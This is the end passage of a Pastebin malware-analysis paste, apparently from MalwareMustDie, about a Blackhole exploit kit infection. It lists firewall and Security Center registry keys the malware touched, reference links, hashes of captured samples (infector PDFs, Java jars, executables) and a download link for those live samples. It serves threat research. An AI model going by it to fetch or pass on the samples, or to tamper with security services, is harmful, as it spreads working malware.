  581. HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall
  582. HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\ServiceDll       "%SystemRoot%\System32\ipnathlp.dll"
  583. HKLM\System\CurrentControlSet\Services\SharedAccess\Setup\InterfacesUnfirewalledAtUpdate\All
  584. HKLM\System\CurrentControlSet\Services\SharedAccess\Setup\ServiceUpgrade
  585. HKLM\System\CurrentControlSet\Services\SharedAccess\Start      
  586. HKLM\System\CurrentControlSet\Services\SharedAccess\Type       
  587. HKLM\System\CurrentControlSet\Services\wscsvc\DependOnService"RpcSs"
  588. HKLM\System\CurrentControlSet\Services\wscsvc\Description       "Monitors system security settings and configurations."
  589. HKLM\System\CurrentControlSet\Services\wscsvc\DisplayName       "Security Center"
  590. HKLM\System\CurrentControlSet\Services\wscsvc\Enum\0 "Root\LEGACY_WSCSVC\0000"
  591. HKLM\System\CurrentControlSet\Services\wscsvc\Enum\Count       
  592. HKLM\System\CurrentControlSet\Services\wscsvc\Enum\NextInstance
  593. HKLM\System\CurrentControlSet\Services\wscsvc\ErrorControl     
  594. HKLM\System\CurrentControlSet\Services\wscsvc\ImagePath "%SystemRoot%\System32\svchost.exe -k netsvcs"
  595. HKLM\System\CurrentControlSet\Services\wscsvc\ObjectName        "LocalSystem"
  596. HKLM\System\CurrentControlSet\Services\wscsvc\Parameters\ServiceDll     "%SYSTEMROOT%\system32\wscsvc.dll"
  597. HKLM\System\CurrentControlSet\Services\wscsvc\Security\Security
  598. HKLM\System\CurrentControlSet\Services\wscsvc\Start
  599. HKLM\System\CurrentControlSet\Services\wscsvc\Type
  600.  
  601. //References::
  602.  
  603. http://malwaremustdie.blogspot.jp/2013/02/blackhole-of-closest-version-with.html
  604. https://www.virustotal.com/file/9f9d664ed03fd46d38fb9c71e095fa857878240c94e5861d451856923f9e73c5/analysis/1360145547/
  605. http://anubis.iseclab.org/?action=result&task_id=11b4576ba32704244115039855eaa5935
  606.  
  607. // we grabbed them all, is in Virus Total now.. MalwareMustDie!!!
  608.  
  609. 2013/02/06  18:32   110,246 209tuj2dsljdglsgjwrigslgkjskga.php 59be5511a32cb4dcfcceac7d6d9fbff9 (3/46)
  610. 2013/02/06  19:11   167,936 calc.exe                           8f3f3be426c62710145252b8b031308d (9/46)
  611. 2013/02/06  18:43    20,197 infector1.pdf                      8b22f32c404fb798bfa85899ab898ae2 (21/46)
  612. 2013/02/06  18:43    11,596 infector2.pdf                      20f9d0ed3589f893bad0dc0b2f3a23d3 (14/46)
  613. 2013/02/06  18:48    26,127 java1.jar                          fa7484b3de49e3dbbb5a1f3a51ae2a76 (8/46)
  614. 2013/02/06  18:49    16,640 java2.jar                          ba85a3efd20c73021b3680feeec19503 (9/46)
  615.  
  616. // Samples is here:
  617.  
  618. http://www.mediafire.com/?vu018ca7mp173a7
  619.  
  620. -----
  621. #MalwareMustDie!
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top